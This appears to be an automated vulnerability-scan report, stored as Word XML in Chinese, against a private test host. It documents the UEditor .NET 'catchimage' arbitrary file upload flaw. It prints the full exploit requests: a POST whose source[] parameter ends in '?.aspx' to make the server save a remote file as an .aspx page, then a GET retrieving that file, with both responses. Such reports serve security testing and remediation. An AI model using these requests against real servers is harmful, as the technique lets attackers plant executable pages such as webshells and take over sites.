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sz w:val="40"/>
        </w:rPr>
        <w:t>百度编辑器上传测试存在ueditor 文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr/>
        <w:t>漏洞地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>	http://192.168.0.138:81
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>
漏洞详情：
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>一共1组payload:
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>第1组payload共发送2次请求:
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t>发送第1次请求:
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求数据包：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>POST /net/controller.ashx?action=catchimage HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: 192.168.0.138:81
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
source[]=http://192.168.0.138:81/net/upload/image/20230303/6381345665059378488124281.png?.aspx
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求响应包：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Date: Fri, 03 Mar 2023 09:52:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 206
Cache-Control: private
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
{"state":"SUCCESS","list":[{"state":"SUCCESS","source":"http://192.168.0.138:81/net/upload/image/20230303/6381345665059378488124281.png?.aspx","url":"upload/image/20230303/6381346272770925879437944.aspx"}]}
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>漏洞存在判断条件：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>response.status == 200
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>结果：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>	存在漏洞
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t>发送第2次请求:
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求数据包：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>GET /net/upload/image/20230303/6381346272770925879437944.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Host: 192.168.0.138:81
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>请求响应包：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Date: Fri, 03 Mar 2023 09:52:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1957
Cache-Control: private
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
�PNG
�
���IHDR�������F�����_G�S����sRGB���������gAMA������a����	pHYs����������o�d����IDATx^�;V�@�E�����������������
�&amp;�&lt;�g���fp�X����3����zį��Z@.�&amp;���	��h����@.�&amp;���	��h����@.�&amp;���	��h����@.�&amp;���	��h����@.�&amp;���	��h����@.�&amp;����������\]]-��ϟ5�=�N.Iuss����Ϛ�������?����e������\���{������������=����H�R��dOOO_�.//?D�(��ϖ�C���w�U�U�ޢ�
����]SFu���'v�Ƭ乐k;�:����V3k����%�8��kt���I�(�B=��թ-��戨���g7r��x����N��nu2&lt;&lt;&lt;l�k4Ǭ8�Y.�U�QQ?������᪂�w��M���e��kd�g�έ0g	2�~�o�T�9�k�����Ө��������!�����P�����8Csf�f'H�;����n)a������9�0���i����^���?�E� }��n)����L1�?}rE�����������pr��P�`UrUl�g�����w-��'ɚ\����Z��,���v=x���}z����������N�SB�� �+�
���Re�����/2i��sr����d,�Op��،�Q���#��e4��إ\kAt�fr��O�5�ܞ���UHU,��ϫ2ۯ�}�9��k1ս�&lt;��H��k���䚖YX�����\�����8�,׹'���d��~F}U���h�Q�J�S��w8�
|*UAt[�c&amp;W�l��,�km:��
v�_u�����hLu��^��h_�u��
��,��]IT���'���GFm�ORD��ڪw�(W�m��ק��F�%�u���?�'%�HA���瀺d�0�����k��!&lt;g\{�����X;���F�#�\�jS����\��sN.�[a?eO����r�2&gt;�+��^֤Q;r�ٝ\�?�r�4�\�M �@�����r�4�\�M �@�����r�4�\�M �@�����r�4�\�M �@�����r�4�\�M �@�����r�4�\�M �@�����r�4�\�M �@�����r�4�\�-,��qI�&amp;��������IEND�B`�
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>漏洞存在判断条件：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>response.status == 200
</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>结果：
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000ff"/>
        </w:rPr>
        <w:t>	存在漏洞
</w:t>
      </w:r>
    </w:p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